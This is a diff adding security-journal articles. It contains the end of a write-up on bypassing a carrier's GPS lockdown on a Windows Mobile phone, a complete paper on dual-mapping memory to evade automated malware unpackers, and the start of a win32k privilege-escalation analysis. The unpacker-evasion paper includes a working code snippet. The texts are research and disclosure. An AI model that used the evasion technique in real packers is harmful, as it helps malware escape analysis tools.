+This means that in order to load a proxy DLL, one of two approaches would need
+to be taken.
+
+The first such option is to rename the proxy DLL itself, along with the
+filename of the imported DLL in the desired target module, by modifying the
+actual desired target module itself on-disk. The second option is to rename
+the DLL containing the implementation of the proxied functionality, and then
+load that DLL by the altered name in the proxy DLL. Both approaches are
+functionally equivalent on Windows Mobile; the author chose the former in
+this case.
+
+Through disassembly, a rough estimate of the prototypes of the various APIs
+exported by oemgpsOne.dll was created, and from there, a proxy module
+(oemgpsOneProxy.dll) was written to log specific API calls to a file for later
+analysis. This approach allowed for relatively quick identification of any
+arguments to oemgpsOne.dll calls which were not immediately obvious from static
+disassembly, despite the lack of a debugger on the target when many of the
+calls were made.
+
+3.2. Implementing a Custom oemgpsOne.dll Client
+
+After discerning the prototypes for the various oemgpsOne.dll supporting APIs,
+the next step in unlocking the built-in GPS hardware on the xv6800 was to write
+a custom client program that utilized oemgpsOne.dll to retrieve decrypted
+location values from the gpsOne chipset.
+
+Although one approach to this task might be to attempt to disable the various
+security checks present in LBSDriver.dll, it was deemed easier to re-implement
+an oemgpsOne.dll client from scratch. In addition, this approach also allowed
+the author to circumvent various implementation bugs and limitations present
+in LBSDriver.dll.
+
+Given the information gleaned from analyzing LBSDriver.dll's implementation of
+the challenge-response and GPS decryption logic, and the API call logging from
+the oemgpsOne.dll proxy module, writing a client for oemgpsOne.dll is merely an
+exercise in writing the necessary code to connect all of the pieces together in
+the correct fashion.
+
+After valid GPS position data can be retrieved from oemgpsOne.dll, all that
+remains is to write an adapter layer to connect programs written against the
+standard Windows Mobile gpsapi.dll to the custom oemgpsOne.dll client.
+
+However, there are inherent design limitations in the locked down GPS interface
+that complicate the creation of a practical adapter to convert gpsapi.dll calls
+into oemgpsOne.dll calls.
For example, a naive implementation that might +involve creating a module to replace gpsapi.dll with a custom binary to make +inline calls to oemgpsOne.dll would run aground of a number of pitfalls. + +Specifically, as oemgpsOne.dll depends on gpsapi.dll, attempting to simply +replace gpsapi.dll with a custom module will break the very oemgpsOne.dll +functionality used to communicate with the GPS intermediate driver, due to +the previously mentioned "one dll for a given base name" Windows Mobile +limitation. In addition, it is not possible for two programs to simply +simultaneously operate full clients of oemgpsOne.dll, as the challenge-response +mechanism operates globally and will not operate correctly should two +applications simultaneously attempt to engage it. + +The most straightforward solution to the former issue is to simply rename a +copy of the stock gpsapi.dll, and then modify oemgpsOne.dll to refer to the +renamed gpsapi.dll. This opens the door to replacing the system-supplied +gpsapi.dll with a custom replacement gpsapi.dll implementing a client for +oemgpsOne.dll. + +3.3. Multiplexing GPS Across Multiple Applications. + +The GPS intermediate driver supports multiplexing the GPS hardware present on +a Windows Mobile-based device across multiple applications. However, as +previously noted, the locked down GPS interface breaks this functionality, as +no two programs can participate in the full challenge-response protocol for +keeping the gpsOne hardware active simultaneously. + +Although the first program to start could be designated the "master", and thus +be responsible for challenge-response operations (with secondary programs +merely decrypting position data locally), this introduces a great deal of extra +complexity. Specifically, significant coordination issues arise relating to +cleanly handling the fact that third-party GPS-enabled programs are typically +unaware of each other. Thus, work must be done to handle the case where one +program having previously activated the gpsOne hardware exits, leaving any +remaining programs still using GPS with the problem of selecting a new "master" +program to perform challenge-responses with the GPS intermediate driver. + +Given the difficulties of such an approach, a different model was chosen, such +that the replacement gpsapi.dll acts as a client of a server program which then +mediates access to the locked down GPS interface on behalf of all active GPS- +enabled programs. Although there exist synchronization and coordination issues +with this model, they are simpler to deal with than the alternative +implementation. + +3.4. Caveats. + +While the resultant GPS adapter system supports third-party programs that +utilize gpsapi.dll, any programs using the virtual NMEA serial port interface +will not operate successfully. Unfortunately, the same approach towards the +replacement of gpsapi.dll is not feasible with the APIs utilized in +communication with a serial port, by virtue of the sheer number of function +calls present in coredll.dll that would need to be forwarded on to the real +coredll.dll via a proxy module. + +4. Bugs in the Verizon Wireless xv6800 gpsOne Lock Down Logic + +Few programs designed to lockdown portions of a system via security through +obscurity are bug-free, and the GPS lockdown logic on the xv6800 is certainly +no exception. The lockdown code has a number of localized and systemic issues +pervading the current implementation. + +4.1. 
Thread Safety Issues + +There are a number of threading related issues present throughout the locked +down GPS interface. + +- The GPS intermediate driver does not properly synchronize the case of + multiple simultaneous callers using the extended IOCTLs not present on a + stock GPS intermediate driver implementation. +- LBSDriver.dll utilizes a dedicated thread for performing challenge-response + processing with the GPS intermediate driver. However, there is no + synchronization provided between the challenge-response thread and the thread + that retrieves and decrypts GPS position data, leading to a race condition in + which it might be possible for decryption to return garbage data. + +4.2. API Mis-use + +In several cases, LBSDriver.dll fails to use standard Windows APIs correctly. + +- LBSDriver.dll performs dangerous operations in DllMain, such as loading + other DLLs, despite such operations being long-documented as blatantly + illegal and prone to difficult to diagnose deadlocks (particularly on a + device with extremely limited debugging support). +- When LBSDriver.dll performs the AES decryption on the latitude/longitude + values returned by oemgpsOne.dll, it creates a CryptoAPI key blob, in order + to import the derived AES key into a CryptoAPI key object (via the use of the + CryptImportKey routine). However, the length of the key blob passed to + CryptImportKey is actually too short. This would appear to make + LBSDriver.dll seemingly dependent on a bug in the Windows Mobile 6 + implementation of CryptoAPI. Specifically, the key blob format for a + symmetric key includes a count in bytes of key material, and the data passed + to CryptImportKey is such that the key blob structure claims to extend beyond + the length of bytes that LBSDriver.dll specifies for the key blob structure + itself. It might even be the case that this represents a security problem in + CryptoAPI due to apparently non-functional length checking in this case, as + key blobs are documented to be transportable across an untrusted medium. + +To illustrate second issue, consider the following code fragment: + +// +// Initialize the header. +// + +BlobHeader = (BLOBHEADER *)KeyBlob; + +BlobHeader->bType = PLAINTEXTKEYBLOB; +BlobHeader->bVersion = 2; +BlobHeader->reserved = 0; +BlobHeader->aiKeyAlg = CALG_AES_128; + +// +// Initialize the key length in the BLOB payload. +// + +*(DWORD *)(&KeyBlob[ 0x08 ] ) = KeyLength; + +// +// Initialize the key material in the BLOB payload. +// + +memcpy( KeyBlob + 0x0C, KeyData, KeyLength ); + +// +// Generate a CryptoAPI AES-128 key object from our key material. +// + +if (!CryptImportKey( + CryptProv, + KeyBlob, + KeyLength, // BUGBUG: Should really be KeyLength + 0x0C... + NULL, + 0, + &Key)) +{ + break; +} + +Contrary to the Microsoft-supplied documentation [9] for CryptImportKey, the +third parameter passed to CryptImportKey ("dwDataLen", as "KeyLength" in this +example) is too short for the key blob specified, as the length field in the +blob header itself describes the key material as being "KeyLength" bytes. +Thus, the LBSDriver.dll module would appear to depend upon either CryptoAPI or +the default Microsoft cryptographic provider on Windows Mobile not validating +blob header key material lengths properly, as the supplied blob header claims +that the key material extends outside the provided blob buffer (given the +length passed to CryptImportKey). 
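+
+For comparison, a corrected call -- reusing the hypothetical variable names
+from the fragment above -- would pass the full size of the key blob (the
+BLOBHEADER, the four-byte key length field, and the key material itself),
+which is what the BUGBUG annotation alludes to:
+
+//
+// Generate a CryptoAPI AES-128 key object, this time passing the complete
+// blob length (0x0C header bytes plus KeyLength bytes of key material).
+//
+
+if (!CryptImportKey(
+        CryptProv,
+        KeyBlob,
+        sizeof( BLOBHEADER ) + sizeof( DWORD ) + KeyLength,
+        0,
+        0,
+        &Key))
+{
+    break;
+}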
+ +Microsoft-supplied sample code [10] illustrates the correct construction of a +symmetric key blob, and does not suffer from this deficiency. + +5. Suggested Countermeasures + +Although several attempts were made throughout the GPS lockdown system on the +xv6800 to deter third party programs from successfully communicating with the +integrated gpsOne hardware, the bulk of these checks were relatively easy to +overcome. In fact, the principle barriers to the GPS unlocking projects were +a lack of viable debugging tools for the platform, and an unfamiliarity with +Windows Mobile on the part of the author. + +Nevertheless, several improvements could have been made to improve the +resilience of the lockdown system. + +- Deny assisted GPS availability at the PDE if the user's account is not + provisioned for GPS, or if the privacy policy configured time of day + restrictions are not met. Because the security and lockdown checks are + implemented client-side on the xv6800, they are relatively easily bypassable + by third party applications. However, if the device is capable of performing + a standalone GPS location fix, blocking assisted GPS access will not provide + a hard defense. +- Require code signing from a Verizon Wireless CA for all applications loaded + on the device. Users are, however, unlikely to purchase a device configured + in such a matter, as expensive smartphone-class devices are often sold under + the expectation that third party programs will be easily loadable. +- Moving enforcement checks for operations such as time of day requirements for + the user's desired location privacy policy into the radio firmware and out of + the operating system environment. The radio firmware environment is + significantly closer to a "black box" than the operating system which runs on + the application core of the xv6800. Furthermore, if the software loader on + the xv6800 were secured and locked down, the radio firmware could be made + significantly more proof against unauthorized modifications. One could + envision a system wherein the radio firmware communicates with the carrier's + network out-of-band (with respect to the general-purpose operating system + loaded on the device) to determine when it had been authorized by the user to + provide location information to applications running on the device. + +The client-side checks on the GPS lockdown system are likely a heritage of the +fact that VZ Navigator and LBSDriver.dll appear to be more or less ports from +BREW-based "dumb phones", where the application environment is more tightly +controlled by code signing requirements. The Windows Mobile operating +environment is significantly different in this respect, however. + +Additionally, the author would submit that, from the perspective of attempting +to safeguard users from unauthorized harvesting of their location data (a key +reason cited by Verizon Wireless with respect to the certification process +needed for an application to become approved for location-aware functionality), +a hardware switch to enable or disable the GPS hardware on the device would be +a far better investment. In fact, the xv6800 already possesses a hardware +switch for 802.11 functionality; if this was instead changed to enable or +disable the gpsOne chipset in future smartphone designs, users could be assured +that their location information would be truly secure. + +6. Debugging and Development Challenges on Windows Mobile and the xv6800. 
+ +Windows Mobile has a severely reduced set of standard debugging tools as +compared to the typically highly rich debugging environment available on most +Windows-derived systems. This greatly complicated the process of understanding +the underlying implementation details of the GPS lockdown system. + +The author had access to two debuggers that could be used on the xv6800 at the +time of this writing: the Visual Studio 2005 debugger, and the IDA Pro 5.1 +debugger. Both programs have serious issues in and of their own respective +rights. + +Unfortunately, there does not appear to be any support for WinDbg, the author's +preferred debugging tool, when using Windows CE-based systems, such as Windows +Mobile. Although WinDbg can open ARM dump files (and ARM PE images as a dump +file), and can disassemble ARM instructions, there is no transport to connect +it to a live process on an ARM system. + +The relatively immature state of debugging tools for the Windows Mobile +platform was a significant time consumer in the undertaking of this project. + +6.1. Limitations of the Visual Studio Debugger + +Visual Studio 2005 has integrated support for debugging Windows Mobile-based +applications. However, this support is riddled with bugs, and the quality of +the debugging experience rapidly diminishes if one does not have symbols and +binaries for all images in the process being debugged present on the debugger +machine. In particular, the Visual Studio 2005 debugger seems to be unable to +disassemble at any location other than the current pc register value without +having symbols for the containing binary available. (In the author's +experience, attempting such a feat will fail with a complaint that no code +exists at the desired address.) + +Additionally, there seems to be no support for export symbols on the Windows +Mobile debugger component of Visual Studio 2005. This, coupled with the lack +of freely-targetable disassembly support, often made it difficult to identify +standard API calls from the debugger. The author recommends falling back to +static disassembly whenever possible, as available static disassembly tools, +such as IDA Pro 5.1 Advanced or WinDbg provide a superior user experience. + +6.2. Limitations of the IDA Pro 5.1 Debugger + +Although IDA Pro 5.1 supports debugging of Windows Mobile-based programs, the +debugger has several limitations that made it unfortunately less practical than +the Visual Studio 2005 debugger. Foremost, it would appear that the debugger +does not support suspending and breaking into a Windows Mobile target without +the Windows Mobile target voluntarily breaking in (such as by hitting a +previously defined breakpoint). + +In addition, the default security policy configuration on the device needed to +be modified in order to enable the debugger to connect at all (see note [3]). + +6.3. Replacing a Firmware-baked Execute-in-place Module + +Windows Mobile supports the concept of an execute in place (or XIP) module. +Such an executable image is stored split up into PE sections on disk (and does +not contain a full image header). XIP modules are "baked" into the firmware +image, and cannot be overwritten without flashing the OS firmware on the +device. Conversely, it is not possible to simply copy an XIP module off of the +device and on to a conventional storage medium. + +The advantage of XIP "baked" modules comes into play when one considers the +limited amount of RAM available on a typical Windows Mobile device. 
XIP modules are pre-relocated to a guaranteed available base address, and do
+not require any runtime alterations to their backing memory when mapped. As a
+result, XIP modules can be backed entirely by ROM and not RAM, decreasing the
+(scarce) RAM that must be devoted to holding executable code.
+
+It is possible to supersede an XIP "baked" module without flashing the OS
+image on the xv6800, however. This involves a rather convoluted procedure,
+which amounts to the following steps, for a given XIP module residing in a
+particular directory:
+
+- First, rename the replacement module such that it has a filename which does
+  not conflict with any files present in the directory containing the XIP
+  module to supersede.
+- Next, copy the renamed replacement module into the directory containing the
+  desired XIP module to supersede.
+- Finally, rename the replacement module to have the same filename as the
+  desired XIP module.
+
+Deleting the filename associated with the superseded XIP module will revert
+the device back to the ROM-supplied XIP module. This property proves
+beneficial in that it becomes easy to revert to the stock operating
+system-supplied modules after temporarily superseding them.
+
+6.4. Import Address Table Hooking Limitations
+
+One avenue considered during the development of the replacement gpsapi.dll
+module was to hook the import address tables (IATs) of programs utilizing
+gpsapi.dll.
+
+Unfortunately, import table hooking is a significantly more complicated affair
+on Windows Mobile-based platforms than on standard Windows. The image headers
+for a loaded image are discarded after the image has been mapped, and the IAT
+itself is often relocated to be non-contiguous with the rest of the image.
+
+This relocation is possible as there appears to be an implicit restriction
+that all references to an IAT address in ARM PE images must indirect through a
+global variable that contains the absolute address of the desired IAT address.
+As a result, there are no relative references to the IAT, and thus absolute
+address references may be fixed up with the aid of relocation information. It
+is not clear to the author what purpose this relocation of the IAT outside the
+normal image confines serves on Windows Mobile for non-XIP modules that are
+loaded into device RAM.
+
+Furthermore, the HMODULE of an image does not equate to its load base address
+on Windows Mobile. One can retrieve the real load base address of a module on
+Windows Mobile via the GetModuleInformation API. This is a significant
+departure from standard Windows.
+
+Due to these limitations, the author elected not to pursue IAT hooking for the
+purposes of the GPS unlocking project. Although there is code publicly
+available to cope with the relocation of an image's IAT, it appears to be
+dependent on kernel data structures for which the author did not have a
+conveniently available and accurate definition corresponding to the Windows
+Mobile kernel shipping on the xv6800.
+
+7. Conclusion
+
+Locking down the gpsOne hardware on the xv6800 such that it can only be
+utilized by Verizon Wireless certified and approved applications can be seen
+in two lights. One could consider such actions an anti-competitive move,
+designed to lock out third party programs from having the opportunity to
+compete with VZ Navigator.
However, such reasoning is fairly questionable, given that other carriers in
+the United States (particularly GSM-based carriers) typically fully support
+third party GPS-enabled applications on their devices. As consumers expect
+more full-featured and advanced devices, locking down devices to only
+carrier-approved functionality is becoming an increasingly large competitive
+liability for companies seeking to differentiate their networks and devices in
+today's saturated mobile phone markets.
+
+Furthermore, Verizon Wireless's currently shipping location-enabled
+application for the xv6800, VZ Navigator, remains competitive (by virtue of
+features such as turn-by-turn voice navigation, traffic awareness, and
+automatic re-routing) even if the built-in GPS hardware on the xv6800 were to
+be unlocked for general-purpose use. Freely available navigation programs
+lack these features, and commercial applications are based on a different
+pricing model than the periodic monthly fee model used by VZ Navigator at the
+time of this article's writing.
+
+A more reasonable (although perhaps misguided) rationale for locking down the
+gpsOne hardware is to protect users from having their location harvested or
+tracked by malicious programs. Unfortunately, the relatively open nature of
+Windows Mobile 6, and its lack of particularly effective privilege-level
+isolation once unsigned code is permitted to run, both conspire to greatly
+diminish the effectiveness of the protection schemes that are implemented on
+the xv6800.
+
+Whether this is a legitimate concern or not remains, of course, up for debate,
+but it is clear that the lockdown system as present on the xv6800 is not
+particularly effective at blocking access by unapproved third party
+applications.
+
+Future releases of Windows Mobile claim support for a much more effective
+privilege isolation model that may provide true security from unprivileged,
+malicious programs. However, in currently shipping devices, the operating
+system cannot be relied upon to provide this protection. Relying on security
+through obscurity to implement lockdown and protection schemes may then seem
+attractive, but such mechanisms rarely provide true security.
+
+As mobile phones advance to become more and more powerful devices, in effect
+becoming small general-purpose computers, privacy and security concerns begin
+to gain greater relevance. With the capability to record a user's location,
+audio, and environment (via built-in microphones and cameras present on
+virtually all modern-day phones), there arises the chance for serious privacy
+breaches, especially given that modern-day smartphones have historically not
+seen the more rigorous level of security review that is slowly becoming more
+commonplace on general purpose computers.
+
+One simple and elegant potential solution to these privacy risks is to simply
+provide hardware switches to disable sensitive components, such as cameras or
+embedded GPS hardware. In keeping with this philosophy, the author would
+encourage Verizon Wireless to fully open up their devices, and defer to simple
+and secure methods to allow users to manage their sensitive information, such
+as physical hardware switches.
+
+
+Bibliography:
+
+[1] Verizon Wireless. Commercial Location Based Services.
+    http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSLanding.jsp; accessed October 10, 2008
+
+[2] Verizon Wireless.
LBS Application Questions ("What can I do to ensure that my application is accepted, and to ensure a smooth certification process?"). + http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#LBSAppQues7; accessed October 10, 2008 + +[3] Daniel Álvarez. Debugging Windows Mobile 6 Applications with IDA. + http://dani.foroselectronica.es/debugging-windows-mobile-6-applications-with-ida-69/; accessed October 10, 2008 + +[4] Microsoft. GPS Intermediate Driver Reference. + http://msdn.microsoft.com/en-us/library/ms850332.aspx; accessed October 10, 2008 + +[5] Microsoft. GPSOpenDevice. + http://msdn.microsoft.com/en-us/library/bb202113.aspx; accessed October 10, 2008 + +[6] Microsoft. GPSGetPosition. + http://msdn.microsoft.com/en-us/library/bb202050.aspx; accessed October 10, 2008 + +[7] Verizon Wireless. LBS Application Questions ("Can the user change their privacy settings?"). + http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#GenQues16; accessed October 10, 2008 + +[8] Microsoft. GetModuleFileName Function (Windows). + http://msdn.microsoft.com/en-us/library/ms683197(VS.85).aspx; accessed October 10, 2008 + +[9] Microsoft. CryptImportKey Function (Windows). + http://msdn.microsoft.com/en-us/library/aa380207(VS.85).aspx; accessed October 11, 2008 + +[10] Microsoft. Example C program: Imprtoing a Plaintext Key (Windows). + http://msdn.microsoft.com/en-us/library/aa382383(VS.85).aspx; accessed October 11, 2008 + diff --git a/uninformed/10.2.txt b/uninformed/10.2.txt new file mode 100644 index 0000000..7df5d97 --- /dev/null +++ b/uninformed/10.2.txt @@ -0,0 +1,231 @@ +Using dual-mappings to evade automated unpackers +10/2008 +skape +mmiller@hick.org + +Abstract: Automated unpackers such as Renovo, Saffron, and Pandora's Bochs +attempt to dynamically unpack executables by detecting the execution of code +from regions of virtual memory that have been written to. While this is an +elegant method of detecting dynamic code execution, it is possible to evade +these unpackers by dual-mapping physical pages to two distinct virtual address +regions where one region is used as an editable mapping and the second region +is used as an executable mapping. In this way, the editable mapping is +written to during the unpacking process and the executable mapping is used to +execute the unpacked code dynamically. This effectively evades automated +unpackers which rely on detecting the execution of code from virtual addresses +that have been written to. + +Update: After publishing this article it was pointed out that the design of +the Justin dynamic unpacking system should invalidate evasion techniques that +assume that the unpacking system will only trap on the first execution attempt +of a page that has been written to. Justin counters this evasion technique +implicitly by enforcing W ^ X such that when a page is executed from for the +first time, it is marked as executable but non-writable. Subsequent write +attempts will cause the page be marked as non-executable and dirty. This +logic is enforced across all virtual addresses that are mapped to the same +physical pages. This has the potential to be an effective countermeasure, +although there are a number of implementation complexities that may make it +difficult to realize in a robust fashion, such as those related to the +duplication of handles and the potential for race conditions when +transitioning page protections. + +1. 
Background + +There are a number of automated unpackers that rely on detecting the execution +of dynamic code from virtual addresses that has been written to. This section +provides some background on the approaches taken by these unpackers. + +1.1 Malware Normalization + +Christodorescu et al. described a method of normalizing programs which focuses +on eliminating obfuscation[2]. One of the components of this normalization +process consists of an iterative algorithm that is meant to produce a program +that is not self-generating. In essence, this algorithm relies on detecting +dynamic code execution to identify self-generated code. To support this +algorithm, QEMU was used to monitor the execution flow of the input program as +well as all memory writes that occur. If execution is transferred to an +address that has been written to, it is known that dynamic code is being +executed. + +1.2 Renovo + +Renovo is similar to the malware normalization technique in that it uses an +emulated environment to monitor program execution and memory writes to detect +when dynamic code is executed[3]. Renovo makes use of TEMU as the execution +environment for a given program. When Renovo detects the execution of code +from memory that was written to in the context of a given process, it extracts +the dynamic code and attempts to find the original entry point of the unpacked +executable. + +1.3 Saffron + +Saffron uses two approaches to dynamically unpack executables[5]. The first +approach involves using Pin's dynamic instrumentation facilities to monitor +program execution and memory writes in a direction similar to the emulated +approaches described previously. The second approach makes use of hardware +paging features to detect when execution is transferred to a memory region. +Saffron detects the first time code is executed from a page, regardless of +whether or not it is writable, and logs information about the execution to +support extracting the unpacked executable. This can be seen as a more +generic version of the technique used by OllyBonE which focused on using +paging features to monitor a specific subset of the address space[8]. +OmniUnpack also uses an approach that is similar to Saffron[4]. + +1.4 Pandora's Bochs + +Pandora's Bochs uses techniques similar to those used by Christodorescu and +Renovo[1]. Specifically, Pandora's Bochs uses Bochs as an emulation environment +in which to monitor program execution and memory writes to detect when dynamic +code is executed. + +1.5 Justin + +Justin is a recently developed dynamic unpacking system that was presented at +RAID 2008 after the completion of the initial draft of this paper[9]. Justin +differs from previous work in that is uses hardware non-executable paging +support to enforce W ^ X on virtual address regions. When an execution +attempt occurs, an exception is generated and Justin determines whether or not +the page being executed from was written to previously. The authors of Justin +correctly identified the evasion technique described in the following section +and have attempted to design their system to counter it. Their approach +involves verifying that the protection attributes are the same across all +virtual addresses that map to the same physical pages. This should be an +effective countermeasure, although there is certainly room for attacking +implementation weaknesses, should any exist. + +2. 
Dual-mapping + +The automated unpackers described previously rely on their ability to detect +the execution of dynamic code from virtual addresses that have been written +to. This implicitly assumes that the virtual address used to execute code +will be equal to an address that was written to previously. While this +assumption is safe in most circumstances, it is possible to use features +provided by the Windows memory manager to evade this form of detection. + +The basic idea behind this evasion technique involves dual-mapping a set of +physical pages to two virtual address regions. The first region is considered +an editable mapping and the second region is considered an executable mapping. +The contents of the unpacked executable are written to the editable mapping +and later executed using the executable mapping. Since both mappings are +associated with the same physical pages, the act of writing to the editable +mapping indirectly alters the contents of the executable mapping. This evades +detection by making it appear that the code that is executed from the +executable mapping was never actually written to. This technique is +preferable to writing the unpacked executable to disk and then mapping it into +memory as doing so would enable trivial unpacking and detection. + +Implementing this evasion technique on Windows can be accomplished using fully +supported user-mode APIs. First, a pagefile-backed section (anonymous memory +mapping) must be created using the CreateFileMapping API. The handle returned +from this function must then be passed to MapViewOfFile to create both the +editable and executable mappings. Finally, the dynamic code must be unpacked +into the editable mapping through whatever means and then executed using the +executable mapping. This is illustrated in the code below: + +ImageMapping = CreateFileMapping( + INVALID_HANDLE_VALUE, NULL, + PAGE_EXECUTE_READWRITE | SEC_COMMIT, + 0, CodeLength, NULL); + +EditableBaseAddress = MapViewOfFile(ImageMapping, + FILE_MAP_READ | FILE_MAP_WRITE, + 0, 0, 0); +ExecutableBaseAddress = MapViewOfFile(ImageMapping, + FILE_MAP_EXECUTE | FILE_MAP_READ | FILE_MAP_WRITE, + 0, 0, 0); + +CopyMemory(EditableBaseAddress, + CodeBuffer, CodeLength); + +((VOID (*)())ExecutableBaseAddress)(); + +The example code provides an illustration of using this technique to execute +dynamic code. This technique should also be fairly easy to adapt to the +unpacking code used by existing packers. One consideration that must be made +when using this technique is that relocations must be applied to the unpacked +executable relative to the base address of the executable mapping. With that +said, the relocation fixups themselves must be applied to the editable mapping +in order to avoid tainting the executable mapping. + +An additional evasion technique may also be necessary for certain dynamic +unpackers that monitor code execution from any virtual address, regardless of +whether or not it was previously written to. This is the case with Saffron's +paging-based automated unpacker[5]. For performance reasons, Saffron only logs +information the first time code is executed from a page. If the contents of +the code changes after this point, Saffron will not be aware of them. This +makes it possible to evade this form of unpacking by executing innocuous code +from each page of the executable mapping. Once this has finished, the actual +unpacked executable can be extracted into the editable mapping and then +executed normally. 
This evasion technique should also be effective against +Justin due to the fact that Justin does not trap on subsequent execution +attempts from a given virtual address[9]. + +While these evasion techniques are expected to be effective, they have not +been experimentally verified. There are a number of reasons for this. No +public version of Pandora's Bochs is currently available. However, its author +has indicated that this technique should be effective. Renovo provides a web +interface that can be used to analyze and unpack executables. No data was +received after uploading an executable that simulated this evasion technique. +The authors of Saffron have indicated that they expected this technique to be +effective. + +3. Weaknesses + +Perhaps the most significant weakness of the dual-mapping technique is that it +is not capable of evading all automated unpackers. For example, dynamic +unpacking techniques that strictly focus on control flow transfers, such as +PolyUnpack[7] and ParaDyn[6], should still be effective. However, this +weakness could be overcome by incorporating additional evasion techniques, +such as those mentioned in cited work[7]. + +Automated unpackers could also attempt to invalidate the dual-mapping +technique by monitoring writes and code execution in terms of physical +addresses rather than virtual addresses. This would be effective due to the +the fact that both the editable and executable virtual mappings would refer to +the same physical addresses. However, this approach would likely require a +better understanding of operating system semantics since memory may be paged +in and out at any time. + +4. Conclusion + +The dual-mapping technique can be used by packers to evade automated unpacking +tools that rely on detecting dynamic code execution from virtual addresses +that have been written to. While this evasion technique is expected to be +effective in its current form, it should be possible for automated unpackers +to adapt to handle this scenario such as by monitoring writes to physical +pages or by better understanding operating system semantics that deal with +virtual memory mappings. + +References + +[1] L. Boehne. Pandora's bochs: Automatic unpacking of malware. + http://www.0x0badc0.de/PandorasBochs.pdf, Jan 2008. + +[2] Mihai Christodorescu, Johannes Kinder, Somesh Jha, Stefan Katzenbeisser, + and Helmut Veith. Malware normalization. Technical Report 1539, University + of Wisconsin and Madison, Wisconsin, USA, November 2005. + +[3] M. Gyung Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor + for packed executables. + http://www.andrew.cmu.edu/user/ppoosank/papers/renovo.pdf, Oct 2007. + +[4] L. Martignoni, M. Christodorescu, and S. Jha. Omniunpack: Fast and generic + and and safe unpacking of malware. + http://www.acsac.org/2007/papers/151.pdf, December 2007. + +[5] Danny Quist and Valsmith. Covert debugging: Circumventing software + armoring techniques. BlackHat USA, Aug 2007. + +[6] K. Roundy. Analysis and instrumentation of packed binary code. + http://www.cs.wisc.edu/condor/PCW2008/paradyn_presentations/roundy-packedCode.ppt, + Apr 2008. + +[7] P. Royal, M. Haplin, D. Dagon, R. Edmonds, and W. Lee. Polyunpack: + Automating the hidden-code extraction of unpack-executing malware. 22nd + Annual Computer Security Applications Conference, Dec 2005. + +[8] J. Stewart. Ollybone. 2006. + +[9] Fanglu Guo, Peter Ferrie, and Tzi cker Chiueh. A study + of the packer problem and its solutions. In RAID, pages + 98.115, 2008. 
diff --git a/uninformed/10.3.txt b/uninformed/10.3.txt new file mode 100644 index 0000000..8429431 --- /dev/null +++ b/uninformed/10.3.txt @@ -0,0 +1,867 @@ +Analyzing local privilege escalations in win32k
+10/2008
+mxatone
+mxatone@gmail.com
+
+Abstract: This paper analyzes three vulnerabilities that were found in
+win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a
+major component of the GUI subsystem in the Windows operating system. These
+vulnerabilities have been reported by the author and patched in MS08-025[1]. The
+first vulnerability is a kernel pool overflow with an old communication
+mechanism called the Dynamic Data Exchange (DDE) protocol. The second
+vulnerability involves improper use of the ProbeForWrite function within
+string management functions. The third vulnerability concerns how win32k
+handles system menu functions. Their discovery and exploitation are covered.
+
+1) Introduction
+
+The design of modern operating systems provides a separation of privileges
+between processes. This design restricts a non-privileged user from directly
+affecting processes they do not have access to. This enforcement relies on
+both hardware and software features. The hardware features protect devices
+against unknown operations. A secure environment provides only the necessary
+rights by filtering program interaction within the overall system. This
+mediation adds interfaces of its own, and with them additional security
+risks. Abusing operating system design or implementation flaws in order to
+elevate a program's rights is called a privilege escalation.
+
+Over the past few years, userland code and userland protections have
+improved. A better understanding of operating system internals has made
+abnormal behaviour easier to detect, and the exploitation of classical
+weaknesses is harder than it used to be. Nowadays, local exploitation
+directly targets the kernel. Kernel local privilege escalation brings up new
+exploitation methods, and most of them are certainly still undiscovered. Even
+though the Windows kernel is well protected against known attack vectors, the
+operating system itself ships with a lot of different drivers that contribute
+to its overall attack surface.
+
+On Windows, the graphical user interface (GUI) is divided into both
+kernel-mode and user-mode components. The win32k.sys driver handles user-mode
+requests for graphic rendering and window management. It also redirects
+DirectX calls to the appropriate driver. For local privilege escalation,
+win32k represents an interesting target as it exists on all versions of
+Windows and some features have existed for years without modifications.
+
+This article presents the author's work on analyzing the win32k driver to find
+and report vulnerabilities that were addressed in Microsoft bulletin
+MS08-025[1]. Although the patch adds an overall protection layer, it addresses
+three reported vulnerabilities in different parts of the driver. The Windows
+graphics stack is very complex and this article will focus on describing some
+of win32k's organization and functionality. Any reader who is interested in
+this topic is encouraged to look at the MSDN documentation for additional
+information.
+
+The structure of this paper is as follows. In chapter 2, the basics of the
+win32k driver architecture will be presented with a focus on vulnerable
+contexts. Chapter 3 will detail how each of the three vulnerabilities was
+discovered and exploited. Finally, chapter 4 will discuss possible security
+improvements for the vulnerable driver.
+
+2) Win32k design
+
+Windows is based on a graphical user interface and cannot work without it. Only
+Windows Server 2008 in server core mode uses a minimalist user interface, but
+it shares the exact same components as a typical user interface. The win32k
+driver is a critical component in the graphics stack, exporting more than 600
+functions. It extends the System Service Descriptor Table (SSDT) with another
+table called W32pServiceTable. This driver is not as big as the
+main kernel module (ntoskrnl.exe) but its interaction with
+user-mode is just as important. The service table for win32k contains fewer
+than 300 functions, depending on the version of Windows. The win32k driver
+commonly transfers control to user-mode with a user-mode callback system that
+will be explained in this section. The interface between user-mode modules and
+kernel-mode drivers has been built in order to facilitate window creation and
+management. This is a critical feature of Windows, which may explain why
+exactly the same functions can be seen across multiple operating system
+versions.
+
+2.1) General security implementation
+
+The most important part of a driver in terms of security is how it validates
+user-mode inputs. Each argument passed as a pointer must be a valid user-mode
+address and must not change while the kernel uses it, in order to avoid race
+conditions. This validation is often accomplished by comparing a provided
+address with an address near the base of kernel memory using functions such
+as ProbeForRead and ProbeForWrite. Input contained within pointers is also
+typically cached in local variables (capturing). The Windows kernel is very
+strict about this. When you look deeper into win32k's functions, you will see
+that they do not follow the same strict integrity verifications made by the
+kernel. For example, consider the following check made by the Windows kernel
+(translated to C):
+
+NTSTATUS NTAPI NtQueryInformationPort(
+    HANDLE PortHandle,
+    PORT_INFORMATION_CLASS PortInformationClass,
+    PVOID PortInformation,
+    ULONG PortInformationLength,
+    PULONG ReturnLength
+    )
+
+[...] // Prepare local variables
+
+if (AccessMode != KernelMode)
+{
+   __try {
+      // Check submitted address - if incorrect, raise an exception
+      ProbeForWrite( PortInformation, PortInformationLength, 4);
+
+      if (ReturnLength != NULL)
+      {
+         if ((ULONG_PTR)ReturnLength > MmUserProbeAddress)
